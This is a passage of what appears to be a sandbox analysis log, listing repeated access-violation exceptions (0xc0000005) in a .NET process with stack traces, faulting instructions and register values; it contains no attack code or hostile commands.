registers.ebx: 4124556 registers.esi: 41315892 registers.ecx: 41574692	1
__exception__ Nov. 3, 2023, 12:04 p.m.	stacktrace: 0x4d06a50 0x4d083d2 0x4d07fb0 0x4d0254d 0x4d014af 0x7ef8c6 0x7ec787 0x7e6985 0x7e6496 0x7e3483 0x7e2ee8 0x7e2e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4d06a93 registers.esp: 4121868 registers.edi: 4122144 registers.eax: 0 registers.ebp: 4121876 registers.edx: 0 registers.ebx: 4124556 registers.esi: 41315892 registers.ecx: 42972896	1
__exception__ Nov. 3, 2023, 12:04 p.m.	stacktrace: 0x4d06a50 0x4d083d2 0x4d07fb0 0x4d0254d 0x4d014af 0x7ef8c6 0x7ec787 0x7e6985 0x7e6496 0x7e3483 0x7e2ee8 0x7e2e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4d06a93 registers.esp: 4121868 registers.edi: 4122144 registers.eax: 0 registers.ebp: 4121876 registers.edx: 0 registers.ebx: 4124556 registers.esi: 41315892 registers.ecx: 44371088	1
__exception__ Nov. 3, 2023, 12:04 p.m.	stacktrace: 0x4d06a50 0x4d088da 0x4d08500 0x4d02535 0x4d0159c 0x7ef8c6 0x7ec787 0x7e6985 0x7e6496 0x7e3483 0x7e2ee8 0x7e2e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4d06a93 registers.esp: 4121888 registers.edi: 4122144 registers.eax: 0 registers.ebp: 4121896 registers.edx: 0 registers.ebx: 4124556 registers.esi: 41315892 registers.ecx: 45769360	1
__exception__ Nov. 3, 2023, 12:04 p.m.	stacktrace: 0x4d06a50 0x4d088da 0x4d08500 0x4d0254d 0x4d0159c 0x7ef8c6 0x7ec787 0x7e6985 0x7e6496 0x7e3483 0x7e2ee8 0x7e2e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4d06a93 registers.esp: 4121888 registers.edi: 4122144 registers.eax: 0 registers.ebp: 4121896 registers.edx: 0 registers.ebx: 4124556 registers.esi: 41315892 registers.ecx: 42553384	1
__exception__ Nov. 3, 2023, 12:04 p.m.	stacktrace: 0x4d06a50 0x4d088da 0x4d08500 0x4d0254d 0x4d0159c 0x7ef8c6 0x7ec787 0x7e6985 0x7e6496 0x7e3483 0x7e2ee8 0x7e2e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4d06a93 registers.esp: 4121888 registers.edi: 4122144 registers.eax: 0 registers.ebp: 4121896 registers.edx: 0 registers.ebx: 4124556 registers.esi: 41315892 registers.ecx: 43954320	1
__exception__ Nov. 3, 2023, 12:04 p.m.	stacktrace: 0x4d06a50 0x4d098af 0x4d09081 0x7ef8f4 0x7ec787 0x7e6985 0x7e6496 0x7e3483 0x7e2ee8 0x7e2e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4d06a93 registers.esp: 4122800 registers.edi: 4123080 registers.eax: 0 registers.ebp: 4122808 registers.edx: 0 registers.ebx: 4124556 registers.esi: 44521816 registers.ecx: 44528900	1
__exception__ Nov. 3, 2023, 12:04 p.m.	stacktrace: 0x978765 0x978536 0x9764f5 0x9760ce 0x973483 0x972ee8 0x972e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x9788a0 registers.esp: 2813092 registers.edi: 2813144 registers.eax: 0 registers.ebp: 2813156 registers.edx: 6248848 registers.ebx: 2814372 registers.esi: 40473624 registers.ecx: 0	1
__exception__ Nov. 3, 2023, 12:04 p.m.	stacktrace: 0x7ebcb50 0x7eb8c60 0x7eb8711 0x7eb862d 0x7eb6ccb 0x7eb5f96 0x97c787 0x9765bd 0x9760ce 0x973483 0x972ee8 0x972e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7ebcb93 registers.esp: 2811652 registers.edi: 2811936 registers.eax: 0 registers.ebp: 2811660 registers.edx: 0 registers.ebx: 2814372 registers.esi: 41678428 registers.ecx: 42804572	1
__exception__ Nov. 3, 2023, 12:04 p.m.	stacktrace: 0x7ebcb50 0x7eb8c60 0x7eb8711 0x7eb8645 0x7eb6ccb 0x7eb5f96 0x97c787 0x9765bd 0x9760ce 0x973483 0x972ee8 0x972e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7ebcb93 registers.esp: 2811652 registers.edi: 2811936 registers.eax: 0 registers.ebp: 2811660 registers.edx: 0 registers.ebx: 2814372 registers.esi: 41678428 registers.ecx: 40441340	1
__exception__ Nov. 3, 2023, 12:04 p.m.	stacktrace: 0x7ebcb50 0x7eb8c60 0x7eb8711 0x7eb8645 0x7eb6ccb 0x7eb5f96 0x97c787 0x9765bd 0x9760ce 0x973483 0x972ee8 0x972e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7ebcb93 registers.esp: 2811652 registers.edi: 2811936 registers.eax: 0 registers.ebp: 2811660 registers.edx: 0 registers.ebx: 2814372 registers.esi: 40182988 registers.ecx: 41745952	1
__exception__ Nov. 3, 2023, 12:04 p.m.	stacktrace: 0x7eb5f96 0x97c787 0x9765bd 0x9760ce 0x973483 0x972ee8 0x972e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 39 09 e8 7a b1 82 69 89 85 ec fc ff ff 8d bd e4 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7eb6fdf registers.esp: 2812040 registers.edi: 2813180 registers.eax: 0 registers.ebp: 2813216 registers.edx: 0 registers.ebx: 2814372 registers.esi: 2812752 registers.ecx: 0	1
__exception__ Nov. 3, 2023, 12:04 p.m.	stacktrace: 0x7ebcb50 0x7ebde0e 0x7ebd860 0x7eb862d 0x7eb74a4 0x7eb5f96 0x97c787 0x9765bd 0x9760ce 0x973483 0x972ee8 0x972e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7ebcb93 registers.esp: 2811612 registers.edi: 2811952 registers.eax: 0 registers.ebp: 2811620 registers.edx: 0 registers.ebx: 2814372 registers.esi: 40182988 registers.ecx: 43056832	1
__exception__ Nov. 3, 2023, 12:04 p.m.	stacktrace: 0x7ebcb50 0x7ebde0e 0x7ebd860 0x7eb8645 0x7eb74a4 0x7eb5f96 0x97c787 0x9765bd 0x9760ce 0x973483 0x972ee8 0x972e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7ebcb93 registers.esp: 2811612 registers.edi: 2811952 registers.eax: 0 registers.ebp: 2811620 registers.edx: 0 registers.ebx: 2814372 registers.esi: 40182988 registers.ecx: 44406504	1
__exception__ Nov. 3, 2023, 12:04 p.m.	stacktrace: 0x7ebcb50 0x7ebde0e 0x7ebd860 0x7eb8645 0x7eb74a4 0x7eb5f96 0x97c787 0x9765bd 0x9760ce 0x973483 0x972ee8 0x972e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7ebcb93 registers.esp: 2811612 registers.edi: 2811952 registers.eax: 0 registers.ebp: 2811620 registers.edx: 0 registers.ebx: 2814372 registers.esi: 40182988 registers.ecx: 45756176	1
